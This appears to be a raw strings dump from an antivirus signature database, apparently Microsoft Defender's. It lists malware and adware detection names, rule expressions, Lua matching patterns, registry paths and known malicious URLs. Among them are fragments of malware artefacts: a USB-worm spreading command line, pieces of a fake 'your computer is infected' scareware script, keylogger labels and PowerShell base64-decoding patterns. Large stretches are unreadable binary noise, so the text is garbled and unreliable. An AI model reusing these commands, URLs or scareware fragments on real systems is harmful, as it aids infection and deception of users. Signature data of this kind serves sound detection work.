9Xf<P }%)go aLYKF7 Sp\"8> `n\"i! Parameters\\Policy\\Persistent\\Filter\\\\{70694559-714a-4a38-a0cd-51439e06f1d8} YEipJq8J Parameters\\Policy\\Persistent\\Filter\\\\{89a89b7c-b5ab-4ed6-bf05-d3059281a5c5} AppContainerBoottimeFilter Parameters\\Policy\\Persistent\\Filter\\\\{84750a0c-b836-48e3-ab80-104985c857db} Parameters\\Policy\\Persistent\\Filter\\\\{e72646bc-7d3f-4c5c-a679-b3716f8c6cc8} Parameters\\Policy\\Persistent\\Filter\\\\{b98b75dc-17c0-4e84-bd4e-2080527ca6a6} Apple Inc.p 2FNC3A47ZFp EQHXZ8M8AVp UBF8T346G9p 0u6U@ xcD,S: ?L @, Z1zQp s?!0p 94iJ: jr_6\"C g<mc~p n5w37 =KK9: <R-ztw -kG!p 'o1 E$p 5(VH_Z AdPQ[} 4d\\)v {t0/i ?Dm12 mhG{p '\\0 , !Linkury Program:Win32/Ymacco.AACE Program:Win32/Ymacco.AA8E !Small!rfn Program:Win32/Ymacco.AACC Program:Win32/Ymacco.AAD0 Adware:Win64/Neoreklami!rfn Program:Win32/Ymacco.AAC5 !Phorpiex.AJY!MSR http://worm.ws/ http://seuufhehfueughek.ws/ http://tsrv4.ws/ %s\\%s\\DriveMgr.exe /c start __ & __\\DriveMgr.exe & exit] Program:Win32/Ymacco.AA10 Program:Win32/Ymacco.AAE3 Program:Win32/Ymacco.AA93 Program:Win32/Ymacco.AAC6 >3j)s;u:2 MonitoringTool:Win32/Despy !Fareit.PA!MTB M.0>g Program:Win32/Ymacco.AAA8 Program:Win32/Ymacco.AA57 Program:Win32/AdAgent!MTB !PassStealer!MTB MonitoringTool:Win32/AnyKeyl ARedirector Program:Win32/Ymacco.AA3C PUA:Win32/Haozip 2345 Lua:HaoZip PUA:Win32/2345Browser Lua:Browser2345 PUA:MacOS/Bundlore.Sf!MTB PUA:MacOS/Bundlore.Sf1|PUA:MacOS/Bundlore.Sf2&!PUA:Exceptionz @<PUA:MacOS/Bundlore.Sf1|PUA:MacOS/Bundlore.Sf2&!PUA:Exceptionz PUA:Win32/DumpLsass.A PUA:Win32/uTorrent_BundleInstaller \"PUA:Win32/uTorrent_BundleInstaller RZD(B PUA:Block:uTorrent_BundleInstaller&CONTEXT:PUA:InstallContextMet&!PUA:Exception SOPUA:Block:uTorrent_BundleInstaller&CONTEXT:PUA:InstallContextMet&!PUA:Exception PUA:ML:Blocked:uTorrent_BundleInstaller&CONTEXT:PUA:InstallContextMet&!PUA:Exceptionz XTPUA:ML:Blocked:uTorrent_BundleInstaller&CONTEXT:PUA:InstallContextMet&!PUA:Exceptionz App:Utorrent_BundleInstaller %appdata%\\utorrent %userprofile%\\downloads\\utweb_installer*.exe *\\utorrent.exe %userprofile%\\downloads\\utweb_installer*.exe*\\utorrent.exe *CN=?Bittorrent Inc* *O=?Bittorrent Inc* *CN=?Bittorrent Inc**O=?Bittorrent Inc* BitTorrent Inc. BitTorrent, Inc. BitTorrent Inc.BitTorrent, Inc.z PUA:Win32/FreeSnippingTool PUA:Block:FreeSnippingTool&!PUA:Exceptionz -)PUA:Block:FreeSnippingTool&!PUA:Exceptionz Program:Win32/Ymacco.AA28 Adware:Script/Wacatac.C!ml SoftwareBundler:Script/Wacatac.C!ml #SoftwareBundler:Script/Wacatac.C!ml Misleading:Script/Wacatac.C!ml BrowserModifier:Script/Wacatac.C!ml #BrowserModifier:Script/Wacatac.C!ml !Wacatac.B!ml SoftwareBundler:Win32/Wacatac.B!ml \"SoftwareBundler:Win32/Wacatac.B!ml Misleading:Win32/Wacatac.B!ml BrowserModifier:Win32/Wacatac.B!ml \"BrowserModifier:Win32/Wacatac.B!ml Adware:Script/Wacatac.B!ml SoftwareBundler:Script/Wacatac.B!ml #SoftwareBundler:Script/Wacatac.B!ml Misleading:Script/Wacatac.B!ml BrowserModifier:Script/Wacatac.B!ml #BrowserModifier:Script/Wacatac.B!ml Adware:Script/Conteban.A!ml SoftwareBundler:Script/Conteban.A!ml $SoftwareBundler:Script/Conteban.A!ml Misleading:Script/Conteban.A!ml BrowserModifier:Script/Conteban.A!ml $BrowserModifier:Script/Conteban.A!ml !Phonzy.A!ml SoftwareBundler:Win32/Phonzy.A!ml !SoftwareBundler:Win32/Phonzy.A!ml Misleading:Win32/Phonzy.A!ml BrowserModifier:Win32/Phonzy.A!ml !BrowserModifier:Win32/Phonzy.A!ml Adware:Script/Phonzy.A!ml SoftwareBundler:Script/Phonzy.A!ml \"SoftwareBundler:Script/Phonzy.A!ml Misleading:Script/Phonzy.A!ml BrowserModifier:Script/Phonzy.A!ml \"BrowserModifier:Script/Phonzy.A!ml !Tiggre!rfn SoftwareBundler:Win32/Tiggre!rfn SoftwareBundler:Win32/Tiggre!rfn Misleading:Win32/Tiggre!rfn BrowserModifier:Win32/Tiggre!rfn BrowserModifier:Win32/Tiggre!rfn !Woreflint.A!cl SoftwareBundler:Win32/Woreflint.A!cl $SoftwareBundler:Win32/Woreflint.A!cl Misleading:Win32/Woreflint.A!cl BrowserModifier:Win32/Woreflint.A!cl $BrowserModifier:Win32/Woreflint.A!cl !Masson.A!ac SoftwareBundler:Win32/Masson.A!ac !SoftwareBundler:Win32/Masson.A!ac Misleading:Win32/Masson.A!ac BrowserModifier:Win32/Masson.A!ac !BrowserModifier:Win32/Masson.A!ac !Wacatac.G!ml SoftwareBundler:Win32/Wacatac.G!ml \"SoftwareBundler:Win32/Wacatac.G!ml Misleading:Win32/Wacatac.G!ml BrowserModifier:Win32/Wacatac.G!ml \"BrowserModifier:Win32/Wacatac.G!ml !Conteban.A!ml SoftwareBundler:Win32/Conteban.A!ml #SoftwareBundler:Win32/Conteban.A!ml Misleading:Win32/Conteban.A!ml BrowserModifier:Win32/Conteban.A!ml #BrowserModifier:Win32/Conteban.A!ml !Zpevdo.B SoftwareBundler:Win32/Zpevdo.B Misleading:Win32/Zpevdo.B BrowserModifier:Win32/Zpevdo.B !Skeeyah SoftwareBundler:Win32/Skeeyah Misleading:Win32/Skeeyah BrowserModifier:Win32/Skeeyah !Wacatac.A!ml SoftwareBundler:Win32/Wacatac.A!ml \"SoftwareBundler:Win32/Wacatac.A!ml Misleading:Win32/Wacatac.A!ml BrowserModifier:Win32/Wacatac.A!ml \"BrowserModifier:Win32/Wacatac.A!ml !Wacatac.DF!ml SoftwareBundler:Win32/Wacatac.DF!ml #SoftwareBundler:Win32/Wacatac.DF!ml Misleading:Win32/Wacatac.DF!ml BrowserModifier:Win32/Wacatac.DF!ml #BrowserModifier:Win32/Wacatac.DF!ml !Wacatac.D2!ml SoftwareBundler:Win32/Wacatac.D2!ml #SoftwareBundler:Win32/Wacatac.D2!ml Misleading:Win32/Wacatac.D2!ml BrowserModifier:Win32/Wacatac.D2!ml #BrowserModifier:Win32/Wacatac.D2!ml !Wacatac.D6!ml SoftwareBundler:Win32/Wacatac.D6!ml #SoftwareBundler:Win32/Wacatac.D6!ml Misleading:Win32/Wacatac.D6!ml BrowserModifier:Win32/Wacatac.D6!ml #BrowserModifier:Win32/Wacatac.D6!ml !Wacatac.D8!ml SoftwareBundler:Win32/Wacatac.D8!ml #SoftwareBundler:Win32/Wacatac.D8!ml Misleading:Win32/Wacatac.D8!ml BrowserModifier:Win32/Wacatac.D8!ml #BrowserModifier:Win32/Wacatac.D8!ml !Wacatac.DE!ml SoftwareBundler:Win32/Wacatac.DE!ml #SoftwareBundler:Win32/Wacatac.DE!ml Misleading:Win32/Wacatac.DE!ml BrowserModifier:Win32/Wacatac.DE!ml #BrowserModifier:Win32/Wacatac.DE!ml !Wacatac.D4!ml SoftwareBundler:Win32/Wacatac.D4!ml #SoftwareBundler:Win32/Wacatac.D4!ml Misleading:Win32/Wacatac.D4!ml BrowserModifier:Win32/Wacatac.D4!ml #BrowserModifier:Win32/Wacatac.D4!ml !Wacatac.D3!ml SoftwareBundler:Win32/Wacatac.D3!ml #SoftwareBundler:Win32/Wacatac.D3!ml Misleading:Win32/Wacatac.D3!ml BrowserModifier:Win32/Wacatac.D3!ml #BrowserModifier:Win32/Wacatac.D3!ml !Wacatac.D1!ml SoftwareBundler:Win32/Wacatac.D1!ml #SoftwareBundler:Win32/Wacatac.D1!ml Misleading:Win32/Wacatac.D1!ml BrowserModifier:Win32/Wacatac.D1!ml #BrowserModifier:Win32/Wacatac.D1!ml !Wacatac.D7!ml SoftwareBundler:Win32/Wacatac.D7!ml #SoftwareBundler:Win32/Wacatac.D7!ml Misleading:Win32/Wacatac.D7!ml BrowserModifier:Win32/Wacatac.D7!ml #BrowserModifier:Win32/Wacatac.D7!ml !Bluteal!rfn SoftwareBundler:Win32/Bluteal!rfn !SoftwareBundler:Win32/Bluteal!rfn Misleading:Win32/Bluteal!rfn BrowserModifier:Win32/Bluteal!rfn !BrowserModifier:Win32/Bluteal!rfn !Wacatac.DD!ml SoftwareBundler:Win32/Wacatac.DD!ml #SoftwareBundler:Win32/Wacatac.DD!ml Misleading:Win32/Wacatac.DD!ml BrowserModifier:Win32/Wacatac.DD!ml #BrowserModifier:Win32/Wacatac.DD!ml !Wacatac.D0!ml SoftwareBundler:Win32/Wacatac.D0!ml #SoftwareBundler:Win32/Wacatac.D0!ml Misleading:Win32/Wacatac.D0!ml BrowserModifier:Win32/Wacatac.D0!ml #BrowserModifier:Win32/Wacatac.D0!ml !Wacatac.DA!ml SoftwareBundler:Win32/Wacatac.DA!ml #SoftwareBundler:Win32/Wacatac.DA!ml Misleading:Win32/Wacatac.DA!ml BrowserModifier:Win32/Wacatac.DA!ml #BrowserModifier:Win32/Wacatac.DA!ml !Wacatac.DB!ml SoftwareBundler:Win32/Wacatac.DB!ml #SoftwareBundler:Win32/Wacatac.DB!ml Misleading:Win32/Wacatac.DB!ml BrowserModifier:Win32/Wacatac.DB!ml #BrowserModifier:Win32/Wacatac.DB!ml !Wacatac.D9!ml SoftwareBundler:Win32/Wacatac.D9!ml #SoftwareBundler:Win32/Wacatac.D9!ml Misleading:Win32/Wacatac.D9!ml BrowserModifier:Win32/Wacatac.D9!ml #BrowserModifier:Win32/Wacatac.D9!ml !Wacatac.D5!ml SoftwareBundler:Win32/Wacatac.D5!ml #SoftwareBundler:Win32/Wacatac.D5!ml Misleading:Win32/Wacatac.D5!ml BrowserModifier:Win32/Wacatac.D5!ml #BrowserModifier:Win32/Wacatac.D5!ml !Wacatac.DC!ml SoftwareBundler:Win32/Wacatac.DC!ml #SoftwareBundler:Win32/Wacatac.DC!ml Misleading:Win32/Wacatac.DC!ml BrowserModifier:Win32/Wacatac.DC!ml #BrowserModifier:Win32/Wacatac.DC!ml Adware:Script/Foretype.A!ml SoftwareBundler:Script/Foretype.A!ml $SoftwareBundler:Script/Foretype.A!ml Misleading:Script/Foretype.A!ml BrowserModifier:Script/Foretype.A!ml $BrowserModifier:Script/Foretype.A!ml Adware:Script/Oneeva.A!ml SoftwareBundler:Script/Oneeva.A!ml \"SoftwareBundler:Script/Oneeva.A!ml Misleading:Script/Oneeva.A!ml BrowserModifier:Script/Oneeva.A!ml \"BrowserModifier:Script/Oneeva.A!ml !Ditertag.A SoftwareBundler:Win32/Ditertag.A SoftwareBundler:Win32/Ditertag.A Misleading:Win32/Ditertag.A BrowserModifier:Win32/Ditertag.A BrowserModifier:Win32/Ditertag.A !Bomitag.D!ml SoftwareBundler:Win32/Bomitag.D!ml \"SoftwareBundler:Win32/Bomitag.D!ml Misleading:Win32/Bomitag.D!ml BrowserModifier:Win32/Bomitag.D!ml \"BrowserModifier:Win32/Bomitag.D!ml !Ymacco.AA04 SoftwareBundler:Win32/Ymacco.AA04 !SoftwareBundler:Win32/Ymacco.AA04 Misleading:Win32/Ymacco.AA04 BrowserModifier:Win32/Ymacco.AA04 !BrowserModifier:Win32/Ymacco.AA04 Adware:Script/Woreflint.A!cl SoftwareBundler:Script/Woreflint.A!cl %SoftwareBundler:Script/Woreflint.A!cl Misleading:Script/Woreflint.A!cl Misleading:Script/Woreflint.A!cl BrowserModifier:Script/Woreflint.A!cl %BrowserModifier:Script/Woreflint.A!cl !Occamy.AA Misleading:Win32/Occamy.AA <,??# wV\t?\t r>&%)wV\t?\t& > *92 ^kHD9> ?%ahxN w|,v> +?%~} XA ># = '(h# =&,\\K /bzI< =!>?' ADHD9> CX?&JK m&?!hne Z-~; > .0* ;Z_> <$?gw ? AV@ GI.`1> JKNkA= OT@.#> m&? (* >&56yf 9> ;AIw v>\"X\\@q Q8? ` ?%vwj (?l?S? FSHD9> HQ;*M? ?%ej? s?\"op ?\tv|? 6aHD9> ?\t9HQ <>_.&= NRh{q> W.`1>!X pj ?\t pj ?\tb |A>%pq aXN? P< ? P< ? | aXN? aXN? LO XA > \" ?#pt >\"*._?F> 9>$7L <,?? <,?? K B=\"W^ a?\"ahh ~#=2> aXN?$ >{iNg <^iUg !;;8g 4\\ACg B p3g ?f)eg nHIAg ]6df$ H4$g (iq+g ~<QGExz A;@5g yz#&g vAcLg H)#@zB PS1.g MonitoringTool:AndroidOS/MobileSpy!rfn &MonitoringTool:AndroidOS/MobileSpy!rfn k!rL: !HPDefender TrojanDownloader:ASX/Wimad Y;<A^T SoftwareBundler:Win32/InstallMonster.C &SoftwareBundler:Win32/InstallMonster.C MonitoringTool:Win32/MicTrayDebugger $MonitoringTool:Win32/MicTrayDebugger RPF:TopLevelFile&MonitoringTool:MicTrayKeylogger:Vulnerable:Stk&!Conextant:Cert:NotVulnerable a]RPF:TopLevelFile&MonitoringTool:MicTrayKeylogger:Vulnerable:Stk&!Conextant:Cert:NotVulnerable RPF:TopLevelFile&TEL:MonitoringTool:MicTrayKeylogger:Vulnerable&Conextant:Cert:MaybeVulnerable&!Conextant:Cert:NotVulnerable_ |RPF:TopLevelFile&TEL:MonitoringTool:MicTrayKeylogger:Vulnerable&Conextant:Cert:MaybeVulnerable&!Conextant:Cert:NotVulnerable_ c:\\users\\Public\\MicTray.log] PUA:Win32/InstallCapital PUA:Block:InstallCapital&!PUA:Exceptionz +'PUA:Block:InstallCapital&!PUA:Exceptionz !FakeMedia SoftwareBundler:Win32/Ogimant.A!cl \"SoftwareBundler:Win32/Ogimant.A!cl MonitoringTool:Win32/Spector!bit MonitoringTool:Win32/Spector!bit SoftwareBundler:Win32/InstallMonster.D &SoftwareBundler:Win32/InstallMonster.D SoftwareBundler:Win32/ICLoader.D SoftwareBundler:Win32/ICLoader.D SoftwareBundler:Win32/Dlhelper.B SoftwareBundler:Win32/Dlhelper.B !Dofoil.U!bit MonitoringTool:Win32/Anlagent MonitoringTool:Win32/Anlagent$@ qZSBb& +|Vi' Zx.!: #]Zcg 6~3Qbm BrowserModifier:Win32/Xeelyak 0\tm. \\YAC.lnk_ \\Elex-tech\\iSafeSvc.dll_ &\\Elex-tech\\iSafeSvc.dll_ \\Elex-tech\\YAC\\iDesk\\desk.ini_ (x86)\\Elex-tech\\iSafeSvc.dll_+ & (x86)\\Elex-tech\\iSafeSvc.dll_+ \\Microsoft\\Windows\\SendTo\\YAC Desktop.lnk_I \\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\StartMenu\\YAC.lnk_Q \\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\StartMenu\\YAC Desktop.lnk__ \\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\StartMenu\\Depth clean up junk files.lnk` \\YAC` \\Elex-tech` &\\Elex-tech` (x86)\\Elex-tech` & (x86)\\Elex-tech` \\iSafeRightKeyScan`, \\Microsoft\\Windows\\Start Menu\\Programs\\YAC] \\iSafeRightKeyScan`,#\\Microsoft\\Windows\\Start Menu\\Programs\\YAC] !ScarletFlash.A BrowserModifier:Win32/ScarletFlash.A $BrowserModifier:Win32/ScarletFlash.A SoftwareBundler:Win32/ScarletFlash.A $SoftwareBundler:Win32/ScarletFlash.A Misleading:Win32/ScarletFlash.A MisleadingAd:Win32/ScarletFlash.A !MisleadingAd:Win32/ScarletFlash.A MonitoringTool:Win32/ScarletFlash.A #MonitoringTool:Win32/ScarletFlash.A PUA:Win32/ScarletFlash.A RemoteAccess:Win32/ScarletFlash.A !!RemoteAccess:Win32/ScarletFlash.A Rogue:Win32/ScarletFlash.A SettingsModifier:Win32/ScarletFlash.A %SettingsModifier:Win32/ScarletFlash.A MonitoringTool:Win32/AnyKeylogger!bit %MonitoringTool:Win32/AnyKeylogger!bit !Amonetize !Dofoil.V!bit PUA:Win64/CoinMiner PUA:Block:CoinMiner64&!PUA:NamedMiner&!PUA:Exceptionz 84PUA:Block:CoinMiner64&!PUA:NamedMiner&!PUA:Exceptionz PUA:Win32/Auslogics PUA:IRST:Block:Auslogics&!PUA:Exception +'PUA:IRST:Block:Auslogics&!PUA:Exception PUA:Block:Auslogics&CONTEXT:PUA:InstallContextMet&!PUA:Exception D@PUA:Block:Auslogics&CONTEXT:PUA:InstallContextMet&!PUA:Exception PUA:MLVI:Blocked:Auslogics&CONTEXT:PUA:InstallContextMet&!PUA:Exceptionz KGPUA:MLVI:Blocked:Auslogics&CONTEXT:PUA:InstallContextMet&!PUA:Exceptionz !WizzByPass !Bagle!rfn BrowserModifier:Win32/Foxiebro.A!cl #BrowserModifier:Win32/Foxiebro.A!cl \\appvclient.exe 4bb32085dbeb !#LUA:MacroContainer ->xl/vbaproject.bin ->word/vbaproject.bin MHSTR:MacroInside //LUA:MacroInsideContainer !#Lua:CarbanakDownloadFile kldconfig.plug Lua:CarbanakDownloadFile !#Lua:ContextDataProcessName3 Lua:AmsiAppContextDataPresent Lua:AmsiAppContextData:Proc: Lua:AmsiAppContextData:File: 69b34f0ba9e5 (.+)(%.[^%.]*) (.+)%(.+%)$ bb780d009f0f svr_create svr_start svr_stop \tsvr_stop svr_close svr_user_accept svr_user_get_wlan svr_user_recv_notify svr_user_send_notify svr_user_manager svr_user_close mmap_string_rva namerva 113b35cdd0c05 !#FDR:ContextualDropEXEDownloads!111P20 \\downloads$ 68b387d79f8d 112780d8eea01 !#Lua:ContextualDropGamarueRf !#Lua:ContextualDropGamarueRfObMpAttributes xpers ([^\\]+)%..+ !#ALF:LuaContextualDropOutlookContainerFileDrop.A outlook.exe 16678ce37ee26 LowFiDropboxUnderWin !#LUA:O97M/EncDoc.KUI !#LUA:O97M/EncDoc.KUIObMpAttributes document_%d%d%d%d%d%d%d%d%d+_12%d%d2020.xls ,document_%d%d%d%d%d%d%d%d%d+_12%d%d2020.xls document%-%d%d%d%d%d%d%d%d%d.xls !document%-%d%d%d%d%d%d%d%d%d.xls complaint%-copy_%d%d%d%d%d%d%d%d%d+-12%d%d2020.xls 3complaint%-copy_%d%d%d%d%d%d%d%d%d+-12%d%d2020.xls !#Lua:PsCommandlineContext !#Lua:PsCommandlineContextObMpAttributes ~VirTool:Win32/Obfuscator.RC xray_block 7db313d5f4ac transfer \ttransfer addfile \\svchost \t\\svchost a1b30ca210b3 \t@EF@ 35778d22d739a 35778d22d739aFlags1 35b316eb5845 invoke-expression %$env: iex %$env: 5678f89ee816 @BW@D 6a782f66fd20 cdb3efadb67f \\umworkerprocess.exe d378f81c3552 !#Trojan:Win32/SirefefDllInstaller msimg32.dll !#SLF:LuaContextualPSspecPEDrop!rsm roaming.exe 25b30b0e4372 \\sqlservr.exe \\sqlagent.exe b1b3c0867ccc b1b3c0867cccIncludesBMLuaLib ;Q g V?,hg lr1.U( BFruc} aH?lg r4V:% ]u8_g Ua7Sf -eN9> )cD*g a)B]g :*{Fg 8u46| Nj\\6g 06L-g oD~g )2u g %@b~ Jg\" h Uo#aeAm2 PUA:Win32/PremiumInstaller PUA:Block:PremiumInstaller&!PUA:Exception -)PUA:Block:PremiumInstaller&!PUA:Exception PUA:IRST:Block:PremiumInstaller&!PUA:Exceptionz 2.PUA:IRST:Block:PremiumInstaller&!PUA:Exceptionz SoftwareBundler:Win32/Pokovampo SoftwareBundler:Win32/Dlhelper ? 2 ?Jl8g 2Gkgo\\ FrL3^ 8t*FH jup|& E ^m^ e*`gO \"v^S) K E2<.rEJe azveT 5oI)d,Y 2piedzr $Nc \"is# nnJ<M {De[g ctH.1 NXvF4| 8M _( n#2dm 83h>l 83h>l( 8)ZGy 8)ZGy. -OC~pSk -OC~pSk^ Q~U~C IBctg U$7jg fEa5g (g&xg //=&g 8Q:t$ 8Q:t$. 1\\JIg 8&_ 0 Ik%:g J&dGg 0xpng 85mS4 85mS4* 8}IM\" 8}IM\", R<FHD 8`WaZ 8`WaZ* 8Bozp :iyig 8:^~a y7!0g 8)L/. 8)L/.. 8t B, $zO$\" 8Iw=8 8Iw=8, >k5Ug 8Ff+Y 8Ff+Y. q$ZHAu C d%}t l\\im` 01a\"t. $|xR;% y8QPUwAG) 3K:*U -Hud_ i/4(,Q guJ9i 2q7%A oi,zO {DASV XP(U$ o< Cd u)MVR u2ypb uLvVT7V uX-wX? mj#H upl * Y$&\\W( _+4,/y &RjbqbHR C_ |Qi]u<?) VblUg= 1OE#z 9JuJF l|Lf7 K7Zz? v<K5[ rV%DL |&/!we &I(\t:]} NyO-- Q~RH~ )6A-R &sM\tm ZQ\\\t@ ?n@>Dm J E1} o{6U3W 95[,\"'{ {a)r4 AKb]r p0.>@ ZaE6P wdd4W xHQ=uon D gTO xuFg~ @{mG;. tPU U !#TestTrigger2 6e6b5b2a%-ec7e%-4f25%-95bb%-504bb437e95e )6e6b5b2a%-ec7e%-4f25%-95bb%-504bb437e95e RequestIeBlockPage RequestIeBlockControl CONTEXT_DATA_CONTROL_HTML ievtestflag='{dbcbb885%-65d3%-497e%-ae63%-6a2ee5effd62}' 9ievtestflag='{dbcbb885%-65d3%-497e%-ae63%-6a2ee5effd62}' ievtestflag='{04ddafef%-cb54%-4caa%-9060%-59cf0dea1aae}' 9ievtestflag='{04ddafef%-cb54%-4caa%-9060%-59cf0dea1aae}' 2db3569a6ad1 uEF@ 51b3ba9a3b81 checkPossibleEncoded %.ps1 %w%w%w%w%w%w%w%w%w%w%w%w%w%w%w%w+ \"%w%w%w%w%w%w%w%w%w%w%w%w%w%w%w%w+ ([-/]wi?n?d?o?w?s?s?t?y?l?e?)%s+(%w+)%s ) ([-/]wi?n?d?o?w?s?s?t?y?l?e?)%s+(%w+)%s 55b3176a1cd1 ^:\\users\\.*\\appdata MemMappedImage CheckMZPEIfMapped state_type SMS_MBI_COMMIT SMS_MBI_PRIVATE This program cannot be run in DOS mode. +This program cannot be run in DOS mode. !#PEPCODE:VirTool:WinNT/Siapag.gen!B MajorSubsystemVersion DllCharacteristics !#ALF:Lua:ContextualGamPl ^%l%l%l+%.exe$ \\users\\[^\\]+$ !#PEPCODE:VirTool:Win32/Obfuscator.EQ 1efb36faccb7b ([^\\]-([^%.]+))$ !#TEL:Ransom:Win32/AvaddonCrypt.SP!MTB AVG Virus scanner aswQuick.exe Copyright (C) 2014 AVG Technologies CZ, s.r.o. /Copyright (C) 2014 AVG Technologies CZ, s.r.o. 21788fcc8854 getrawu32 HSTR:VirTool:Win32/Obfuscator.PN!xor_plus.1_0A /HSTR:VirTool:Win32/Obfuscator.PN!xor_plus.1_0A HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_6DF1 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_6DF1 HSTR:VirTool:Win32/Obfuscator.PN!xor_plus.1_0D /HSTR:VirTool:Win32/Obfuscator.PN!xor_plus.1_0D HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_6FF3 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_6FF3 c37853e96c7c 18fb3ed23c4f0 UACBypassExp.T!regset (.+)$ !#Lua:Worm:VBS/Jenxcus!Crypt16 ConversionToBinary_fastDec2BinWithKey !#Lua:Worm:VBS/Jenxcus!Crypt16IncludesConversionToBinary_fastDec2BinWithKey TARG:Worm:VBS/Jenxcus!Crypt16 &%schr%(%a-%(%a-%)%-(%d-)%) %a-%s=%s\"(%w-)\" fastDec2BinWithKey (%d+)[^%d]? [Crypt16] 2db3bd31c42a join[regex]::matches '.-'%+ {%d%d?}{%d%d?} 78d7e3beb637 78d7e3beb637Flags1 trustedinstaller binpath\\s*=([^&]+) $trustedinstaller binpath\\s*=([^&]+) \\servicing\\trustedinstaller.exe \\servicing\\trustedinstaller.exe :\\lenovoquickfix\\ aab3264d3223 aab3264d3223IncludesBMLuaLib io.memorystream %-[eE][ncodemaNCODEMA]*%s+ $ms.Seek(0,0) convert]::frombase64string( io.streamreader io.compression.gzipstream ::decompress readtoend() !#Lua:SuspDroppedFilename.A Lua:SuspDropped_svchost.A Lua:SuspDropped_svchost.A!RH !#Lua:ContextRegsvr32AccessTIF.A \\appdata\\local\\microsoft\\windows\\temporary internet files :\\appdata\\local\\microsoft\\windows\\temporary internet files \\appdata\\local\\microsoft\\windows\\inetcache +\\appdata\\local\\microsoft\\windows\\inetcache 15b3ebda6751 pSYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List MSUpdateSvc !Bagle.XD !Bagle.XE *$P$ !Bagle.XF !Bagle.XG !Bagle.XH !Bagle.XI !Bagle.XJ !Bagle.XK !Bagle.XL !Bagle.XM !Bagle.XN !Bagle.XO !Bagle.XP !Bagle.XQ !Bagle.XR !Bagle.XS !Bagle.XT !Bagle.XU TrojanDownloader:ASX/Wimad.AO E__asf_script_command_rpf_generated__ http://www.friskypotato.com/ !Pushbot.KP TrojanDownloader:ASX/Wimad.AP http://mydirecttube.com/ =http://mydirecttube.com/ __asf_script_command_ends_here__ TrojanDownloader:ASX/Wimad.AQ http://activecodec.0fees.net/codec/mp3/codec_download.htm ^http://activecodec.0fees.net/codec/mp3/codec_download.htm !Slenfbot.AFK !Slenfbot.AFL !Agent.JY MonitoringTool:Win32/Orbond.A Hooked HookKeyboard UnhookKeyboard KeyboardCallback 3HookedHookKeyboardUnhookKeyboardKeyboardCallback * USERNAME ftp:// ATTRIB -H \"{executable}\" [DEL] [CAPS] [RArrow] [PageUp] [Home] [NumLock] [LWindows] [MENU]] !Ldpinch.BQ !Ldpinch.BQ\t@ A`+!d il\t 8gb !Vundo.JV !Ldpinch.VD !Ldpinch.VE !Bagle.XV -6=RW !FakeIA.E lKJ0 Enable Protection BUTTON Unblock Keep Blocking 1Enable ProtectionBUTTONUnblockKeep Blocking Security Center Alert SE_SHUTDOWN_NAME SHUTDOWN -r -f -t BrowserModifier:Win32/OneStepSearch.C %BrowserModifier:Win32/OneStepSearch.C www.seekeen.com CommandInstallMainService] !Small.JK !Bagle.XW !Renos.gen!BD !Pushbot.KQ !Renos.GE !Slenfbot.AFM !Renos.BAD !Driver disk.sys is out of memory LYour computer is infected! It is recommended to start spyware cleaner tool. Warning! Security report \"Software\\Microsoft\\Security Center Access violation at address DisableRegistryTools] !Cinmus.N {F9BA1AA9-CAD4-4C14-BDE6-922DFF5F6F38 %{F9BA1AA9-CAD4-4C14-BDE6-922DFF5F6F38 system\\CurrentControlSet\\Services\\Apcdli )system\\CurrentControlSet\\Services\\Apcdli System\\CurrentControlSet\\Services\\ntptdb )System\\CurrentControlSet\\Services\\ntptdb __sysloader__ TempPath sysbar.exe 51edm.net \t51edm.net webbrowser webbrowser] !Renos.GF !Renos.GG !Renos.GH !Renos.GI !Renos.GJ !Renos.GK !Neeris.AN l7mkz !Yektel.J !Renos.GL download.php !Alureon!reg explorer\\mountpoints2\\{ Nexplorer\\mountpoints2\\{ $}\\shell\\open\\command]@=\" resycled\\\\boot.com TrojanDownloader:ASX/Wimad.AR Z__asf_script_command_rpf_generated__ mpegcodecupdate.com/mpgcodec/codec.php !Alureon.gen!C '\"x+n !0'\"x+n AoE9] Rogue:JS/Winwebsec xg'M1 ;y!w' |,C;y!w' thisisimportant-wecheckyourdevices.</title> Tthisisimportant-wecheckyourdevices.</title> P<styletype=\"text/css\"media=\"screen\"> 616c657274282757696e646f77732053656375726974792068617320666f756e642020637269746963616c2070726f6365737320616374697669747920206f6e20796f7572202073797374656d20616e642077696c6c20706572666f726d2066617374207363616e206f662073797374656d202066696c657327293b varsa1=\"tohelppro\";varsa2=\"tectyou\";varsa3=\"rcomp\"+\"uter,wi\"+\"nd\";varsa4=\"owswe\";varsa5=\"bsec\";varsa6=\"urek\"+\"ith\"+\"av\";varsa7=\"edetec\";varsa8=\"tedtro\";varsa9=\"jan\";varsa10=\"sandrea\";varsa11=\"dytoremo\";varsa12=\"vethe\";varsa13=\"m.\";document.getelementbyid('ttt').innerhtml=sa1+sa2+sa3+sa4+sa5+sa6+sa7+sa8+sa9+sa10+sa11+sa12+sa13;varp1=\"sp\"+\"ywa\";varp2=\"reissof !Bagle.XX !SafeSurfing tmr_SurfTimer TuTorrentService CMDToServ ad2.php?ad=ads&s= Rand100to999 jetswap.com jetswap.comx gvum=1-fo2leqnv`q*fkk4szh+mcoAlttn@2-hl-gbrusau,frn0prd+ljk? http://go.jetswap.com/ssflang.php?it=4893473 SafeSurf.Resources.resources !Ldpinch.BR !Bagle.XY -6=R<v !Agent.YG !Agent.YH !Agent.YI !Slenfbot.AFN !Zlob.APG !Renos.GM !Slenfbot.AFO !Vundo.JW !Vundo.JX !Bagle.XZ !Small.JL !Vundo.JY !Slenfbot.AFP !Agent.GS PSSj WSSS !Bagle.YA !Renos.HH !Pushbot.KR !Zlob.gen!CV orage2009C boplayer. _v/video {'V /'tj t/?c=%1.1d%d myc.ico myc.ico%s /do php?type= /do php?type=] !Zlob.gen!CW 0001ec2d00000006MZ h-zllSt}ng LayNam p://w p://w] !Slenfbot.AFQ !Slenfbot.AFR !Slenfbot.AFS !Slenfbot.AFT !Pushbot.KS !Bagle.YB -6=R9 !Bagle.YC !Bagle.YD TrojanDownloader:ASX/Wimad.AS ]__asf_script_command_rpf_generated__ 